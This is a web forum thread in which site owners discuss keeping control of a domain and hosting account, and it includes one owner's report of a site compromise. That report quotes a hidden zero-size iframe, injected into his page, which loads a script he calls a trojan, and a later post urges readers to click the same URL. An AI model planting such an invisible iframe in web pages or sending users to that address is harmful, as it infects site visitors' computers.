SitePoint Sponsor

User Tag List

Results 1 to 12 of 12
  1. #1
    SitePoint Enthusiast
    Join Date
    Mar 2005
    Posts
    27
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    future safety of website ownership - what should we do in advance

    Hi everyone,

    I am going to raise an important issue which i believe must be directly concerning every webmaster.

    To illustrate say I own a website with .com extension and I have been running my website for last 2 years. The website provides information to examiness of various university exams in India.

    Now my q is what happens if someone else by chance gains access to my username and pssword to my account. Do i lose my website to him.

    What options are available to me once it happens.

    Also are there any steps which i am supposed to take in advance to ensure that in any unlikely event, I am able to establish my legal ownership of site considering my website provides just information collected from various sources primarily and i am a small webmaster running website singlehandadly.

    Any particular reference in indian context will be extremely apprecited.

  2. #2
    Afrika
    Join Date
    Jul 2004
    Location
    Nigeria
    Posts
    1,737
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You have to understand that every website hosted could be sub divided into two

    1. Domain name
    2. hosting

    Both are managed with your username and pass

    Your domain name is manage by your domain registrar, and ownership can only be taken if a transfer is initiated of which an email would be sent to the administrative contact.

    For hosting, you could always discuss this with your hosting provider.

    These things rarely happen though, but NOTE: nothing is fully proof.

  3. #3
    SitePoint Enthusiast
    Join Date
    Mar 2005
    Posts
    27
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    hey buddy

    thanks that gives some comfort

  4. #4
    Employed Again Viflux's Avatar
    Join Date
    May 2003
    Location
    London, On.
    Posts
    1,127
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I would further go on to say that a website consists of much more than domain name and hosting.

    You have domain name, FTP account, site admin logins, database logins, and numerous other items.

    One of the most proactive steps you can take to preventing your work/site being hijacked is to use different logins/passwords for each one. Most registrars (the good ones at least) will e-mail you when a change is being made to your account. If you didn't initiate the change, you can easily go into your account, change it back, and change your login information.

    Ask your host to confirm any request for an FTP login change via email or the phone. A responsible host should have no problem with this.

    Have your script notify you, again, via email (different set of logins) when the administrator login for your site is being changed, or even accessed. Record admin logins seperately and ensure there are none that shouldn't have been there.

    Backup your database as often as humanly possible, and make sure that the login you use isn't the same as your login for anything else. It also helps to make sure that your host has database access restricted to localhost (or whatever machine the site is hosted on).

    There are many ways to prevent situations such as you discussed. But there is always the possibility something could happen. I think that if something were to happen, your site compromised, there are (or should be) some legal steps that you can take.

  5. #5
    Afrika
    Join Date
    Jul 2004
    Location
    Nigeria
    Posts
    1,737
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Viflux
    Bodysnatcher





    Join Date: May 2003
    Location: London, On.
    Posts: 444
    I would further go on to say that a website consists of much more than domain name and hosting.

    You have domain name, FTP account, site admin logins, database logins, and numerous other items.
    two basic items are
    1.domain name and 2. hosting

    all other fall under these

  6. #6
    SitePoint Zealot mondala's Avatar
    Join Date
    Nov 2004
    Location
    Ontario, Canada
    Posts
    168
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ahhhh!!!!

    Good topic.

    I have just discovered a trojan horse planted on one of my websites.
    My top advice would be to first have a trusting and reputable webhost.

    On one of my old single page websites that I do not check on often,,,, I have just discovered the following:
    Code:
    <iframe src=http://vipcontact.net/adbanner.php frameborder="0" width="0" height="0" scrolling="no"></iframe>
    DONT GO TO THAT LINK BTW.

    Anyway, this single page site has only one authenticated user and it is highly unlikely that my password was stolen or hacked.... I'm suspecting my host right now who was my first host ever,,,,, they have always been kind of shady. Now days I always choose repuatable hosts, more then one and spread my sites out.... live and learn I guess.

    Now I have to check that my affiliate codes were not changed, and other worries such as this webhost having my credit card info, not to mention I need to transfer all sites immediately.

    GRR.

  7. #7
    SitePoint Member
    Join Date
    Mar 2003
    Location
    Bryan, TX
    Posts
    5
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    mondala's first ever webhost, responds

    Mondala,

    We have scanned the server for any other website that may have had this code or similiar code implanted into it and/or "hacked."

    We found nothing.
    We hired a third party security firm to scan all of our servers on your theory that we were responsible for your website having this code within it.
    We have been ensured that our servers are locked down as well as can be and that nothing has been compromised in their professional opinion and ours.

    As this post covers, the safeguarding of your passwords as well as the complexity of your passwords is the most likely explanation for why your website may have been the only site of the thousands of websites on our servers that have been "hacked" with this add banner code.

    While we value you just as much if not more than all of our other customers, if someone were to have "hacked" your site through a hole in the server's security - why would they have planted an add banner on your site which happens to be one of the lowest traffic websites on our servers (no offense meant, of course).

    We have responded to your email, but felt it may add to the value of this thread - if we backed up the value of good password usage, by mentioning that using your username and password is the only way someone could have placed this code in your webpage.

    We hope you will give us a call or drop us a line, if there are any more questions we may answer for you or any more help that we may render.
    Curtis
    sales@gigabean.com
    979-739-5003

  8. #8
    SitePoint Zealot mondala's Avatar
    Join Date
    Nov 2004
    Location
    Ontario, Canada
    Posts
    168
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    First note that it was not an ADD BANNER. It was a trojan code that your antivirus will detect. Try clicking this URL to see what your antivirus shows you. http://vipcontact.net/adbanner.php

    It is awfully kind of you to jump in here. I never mentioned you by name as the host in question and the dns servers were already changed so there was no mention of Gigabean.

    Anyway, I have received your email and viewed this reply here of yours.

    You have always been very professional and I am highly impressed.

    None the less, regarding password complexity:

    1. Two of the sites in question were using fairly generic passwords which a brute password hack attempt may uncover.

    2. The third site in question was using your assigned password which was for my main account and was 07kr98z. A brute force attack on this account to uncover 07kr98z is highly unlikely and my local computer is highly secure so it was not stolen locally. So if the theory is still a brute force password hack attempt then your suggestion to increase the complexity of my passwords would then fall back on you. If 07kr98z is not good enough then you should change your password complexity for newly created accounts.

    Regarding my sites being low traffic, yes they were, but one site being a homepage for a print newspaper covering a population of 100,000 means that if I have just 5 ad clients unimpressed with the trojan code trying to download on to their computers from my website then that could severly hinder business... so reasoning as to why the hacker would want to embed this in my URL's, I have no idea. I am still suspicious about your not finding anything else, it does not make sense for 3 little sites of 0 traffic value to be the only sites effected. I will be investigating vipcontact.net to get them shutdown.

    Anyway, kudos to you for your professionalism, I will be contacting youl when time permits.

  9. #9
    SitePoint Zealot mondala's Avatar
    Join Date
    Nov 2004
    Location
    Ontario, Canada
    Posts
    168
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    & BTW Gigabean the comment about you being shady was more in regards to concerns about your server reliability, mind you, when I emailed you before leaving on vacation for Vietnam about these concerns, the problems never occurred again.

    Now this brings something to mind.... perhaps a cybercafe in Vietnam captured my account info!!!!!!!! Hmmmmm. This really could be a possibilty??

    Anyone have insight on cybercafe's and how they monitor usuage, history, etc and what security risks there are for shady cyber cafes?

  10. #10
    SitePoint Wizard silver trophy KLB's Avatar
    Join Date
    Nov 2003
    Location
    Maine USA
    Posts
    3,781
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by mondala
    Now this brings something to mind.... perhaps a cybercafe in Vietnam captured my account info!!!!!!!! Hmmmmm. This really could be a possibilty??

    Anyone have insight on cybercafe's and how they monitor usuage, history, etc and what security risks there are for shady cyber cafes?
    I think you found your problem, a key stroke logger on a cafe computer could have easily captured your account information. For this reason, I NEVER log into my accounts from any computer but my own. I always consider computers outside of my direct control to be suspect and compormised. Even my own computer stays locked whenever I'm not around and I strictly limit access to it.

    When it comes to passwords and accounts, trust no one and suspect every strange computer.

    Even someone who is actually trustworthy (e.g. a spouse) can accidently introduce something or accidently expose account information.
    Ken Barbalace: EnvironmentalChemistry.com (Blog, Careers)
    InternetSAR.org
    Volunteers Assist Search and Rescue via Internet
    My Firefox Theme: Classic Compact
    Based onFirefox's default theme but uses much less window space

  11. #11
    SitePoint Zealot mondala's Avatar
    Join Date
    Nov 2004
    Location
    Ontario, Canada
    Posts
    168
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by KLB
    I think you found your problem, a key stroke logger on a cafe computer could have easily captured your account information. For this reason, I NEVER log into my accounts from any computer but my own. I always consider computers outside of my direct control to be suspect and compormised. Even my own computer stays locked whenever I'm not around and I strictly limit access to it.

    When it comes to passwords and accounts, trust no one and suspect every strange computer.

    Even someone who is actually trustworthy (e.g. a spouse) can accidently introduce something or accidently expose account information.
    Yes, I agree, thank you. The Vietnamese cafe owners just seemed so nice and I never suspected them to have a clue or an interest in my web accounts so did not worry about it. I suppose there could have been a crooked kid or uncle of the cafe that after the fact came across my info and tried to do something with it. Might explain the useless implementation of this code on my low traffic sites.


    So let's sum up what we have so far.

    sunandoghosh Asked:

    Now my q is what happens if someone else by chance gains access to my username and pssword to my account. Do i lose my website to him.

    What options are available to me once it happens.
    Basic site security:

    1. Your domain name.
    BEFORE:
    You need to protect your account info and passwords. If you are the registered owner then you will remain the registered owner. The only way for someone to steal your domain is if they had access to the Admin contact email address and/or your registrar account login and password. They could attempt to transfer ownership of your domain or point your DNS else where for profit or defaming or other reasons.

    ATTACKED?:
    Talk to your registrar, ICANN, your lawyer, God.
    Regain ownership of your domain again, if you do, check your DNS server to be pointed to the right place, reset your registrar account passwords, & reset your admin email password.

    2. Your hosting/site content/database itself.
    BEFORE:
    You need to protect your account info and passwords, i.e. cpanel/whm/plesk/ftp/whatever logins. Create complex passwords. Backup your site/database as often as possible!

    ATTACKED?:
    Cry to your host, reset passwords, restore backups.

  12. #12
    SitePoint Enthusiast
    Join Date
    Sep 2004
    Location
    Australia
    Posts
    61
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by mondala
    The only way for someone to steal your domain is if they had access to the Admin contact email address and/or your registrar account login and password.
    Sadly that's not true. Sometimes stranger things happen. Recently Yahoo cancelled several of my domains after confirming their reg and keeping them on my control panel, and suddenly they were available for reg by anyone. Fortunately they were not very valuable so no one grabbed them and i was able to register them again through godaddy. but imagine such a thing happening.

    I dont think someone logged into my a/c and did it as yahoo refunded the money so THEY must have done. also, they are not responding to my mails about the incident so this has to be a blunder on their part.

    Any suggestions on what steps I can take?


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •